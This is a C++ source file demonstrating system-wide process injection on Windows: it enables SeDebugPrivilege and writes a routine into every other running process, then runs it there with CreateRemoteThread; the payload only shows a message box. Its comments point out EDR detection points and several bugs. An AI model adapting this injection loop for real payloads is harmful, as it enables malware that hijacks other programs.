#include<Windows.h>
#include<TlHelp32.h>
#include<iostream>
using namespace std;
// Signature of MessageBoxA as the copied routine will call it through a raw pointer.
typedef int (WINAPI* msgparam)(HWND, LPSTR , LPSTR , UINT);
// Signature of Sleep; declared but not referenced anywhere in this file.
typedef int (WINAPI* sleep)(_In_ DWORD szMillieseconds);
// Parameter block that main() copies into the target process and passes to the remote thread.
struct PARAMETER{
DWORD MshInj; // address of MessageBoxA as resolved in *this* process (truncated to 32 bits by the DWORD cast)
};
// Returns the PID of the first snapshot entry named procName, or 0 when none matches.
DWORD getPid(string procName);
// Enables SeDebugPrivilege on the current token; 0 on success, 1 on failure.
int privileges();
// Routine whose bytes are copied into the target; FunctionStub() only serves as its end marker
// (main() takes FunctionStub - Injection as the byte length, assuming the linker keeps them adjacent).
DWORD Injection(PARAMETER* structure);
DWORD FunctionStub();
int main()
{
// Entry point. Walks a process snapshot and, for every entry except devenv.exe, copies the
// Injection() routine plus a PARAMETER block into that process and starts it on a remote
// thread. This is the textbook CreateRemoteThread pattern; from a monitoring standpoint each
// iteration emits a cross-process OpenProcess(PROCESS_ALL_ACCESS), a PAGE_EXECUTE_READWRITE
// VirtualAllocEx, WriteProcessMemory, and a CreateRemoteThread whose start address lies
// outside any mapped image - all of which are standard EDR detection points.
privileges(); // return value (1 on failure) is ignored
PROCESSENTRY32 Process; // dwSize is never set before the Process32First/Next calls below
HANDLE hProcess; // snapshot handle; never closed
hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
Process32First(hProcess,&Process); // result unchecked; the first entry is skipped because the loop starts with Next
while(Process32Next(hProcess,&Process))
{
cout<<Process.szExeFile<<endl;
// The ANSI szExeFile/strcmp usage means this file is built without UNICODE.
if(strcmp(Process.szExeFile , "devenv.exe")==0)
{
goto hello; // acts as `continue`: devenv.exe is the only process excluded
}
DWORD PID = getPid(Process.szExeFile);
if(PID == 0) {} // no-op: a PID of 0 (not found) is still passed to OpenProcess
HANDLE OpenRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,false,PID); // handle never closed
if(OpenRemoteProcess == 0) { _asm {nop}; } // no-op: a NULL handle still flows into the calls below, which then fail silently
PARAMETER injectedParameters;
// MessageBoxA is resolved locally; the remote call only works if user32 is mapped at the same
// address in the target - presumably true within one session, but not guaranteed.
injectedParameters.MshInj = (DWORD) GetProcAddress(LoadLibrary("User32.dll"),"MessageBoxA");
// Byte length of Injection() is inferred from the address gap to FunctionStub(); this assumes
// the linker emitted them contiguously and in declaration order, which optimisation or
// incremental linking may break.
DWORD szFunctionSize = (PBYTE) FunctionStub - (PBYTE) Injection;
// RWX allocation in a remote process; return value is not checked for NULL.
LPVOID szFunctionAllocation = VirtualAllocEx(OpenRemoteProcess,0,szFunctionSize,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(OpenRemoteProcess,szFunctionAllocation,(void*)Injection,szFunctionSize,0); // result unchecked
LPVOID szParameterAddress = VirtualAllocEx(OpenRemoteProcess,0,sizeof(PARAMETER),MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(OpenRemoteProcess,szParameterAddress,&injectedParameters,sizeof(PARAMETER),0); // result unchecked
// Remote thread starts in the freshly written, non-image memory; handle is never closed.
HANDLE Thread = CreateRemoteThread(OpenRemoteProcess,0,0,(LPTHREAD_START_ROUTINE)szFunctionAllocation,szParameterAddress,0,0);
if(Thread != 0 ) {
WaitForSingleObject(Thread,INFINITE); // blocks until the remote MessageBox is dismissed
}
hello:;
}
return 0;
}
// Returns the th32ProcessID of the first snapshot entry whose szExeFile equals procName,
// or 0 when no entry matches. Closes the snapshot handle on both paths.
// Caveats visible in the code: the snapshot handle is not checked against
// INVALID_HANDLE_VALUE, and the do/while compares `pt` on its first iteration before any
// Process32First/Process32Next call has filled it, i.e. against uninitialised stack memory.
DWORD getPid(string procName){
HANDLE hsnap;
PROCESSENTRY32 pt;
hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pt.dwSize = sizeof(PROCESSENTRY32); // required by the Toolhelp API before enumeration
do{
if(!strcmp(pt.szExeFile, procName.c_str())){
DWORD pid = pt.th32ProcessID;
CloseHandle(hsnap);
return pid;
}
} while(Process32Next(hsnap, &pt));
CloseHandle(hsnap);
return 0;
}
// Routine executed inside the target process after main() copies its bytes there.
// The only external address it is meant to use is the MessageBoxA pointer carried in
// `structure`. Note that the two string literals are referenced by address into this
// process's image and are not part of the copied byte range, so in the target they
// resolve to whatever happens to be mapped at those addresses.
DWORD Injection(PARAMETER* structure)
{
msgparam msgbox = (msgparam) structure->MshInj;
msgbox(0,"Hello from Partial System Wide Injection","Injection",MB_OK|MB_SYSTEMMODAL|MB_NOFOCUS);
return 0;
}
// Never called. Exists only so main() can compute the length of Injection() as
// (PBYTE)FunctionStub - (PBYTE)Injection; this relies on the linker placing the two
// functions back to back, which is not guaranteed.
DWORD FunctionStub(){
return 0;
}
// Enables SeDebugPrivilege on the current process token (main() calls this before its
// OpenProcess loop). Returns 0 on success and 1 when the token cannot be opened or
// AdjustTokenPrivileges fails. The token handle is intentionally left open here to match
// the original behaviour; also note that a non-zero AdjustTokenPrivileges return does not
// by itself prove the privilege was granted - GetLastError() may still report
// ERROR_NOT_ALL_ASSIGNED, which this routine does not inspect.
int privileges(){
HANDLE hToken;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)){
return 1; // could not open our own token
}
TOKEN_PRIVILEGES newState;
newState.PrivilegeCount = 1;
newState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &newState.Privileges[0].Luid); // result unchecked
const BOOL adjusted = AdjustTokenPrivileges(hToken, 0, &newState, sizeof(newState), NULL, NULL);
return adjusted ? 0 : 1; // 0 = success, 1 = failure
}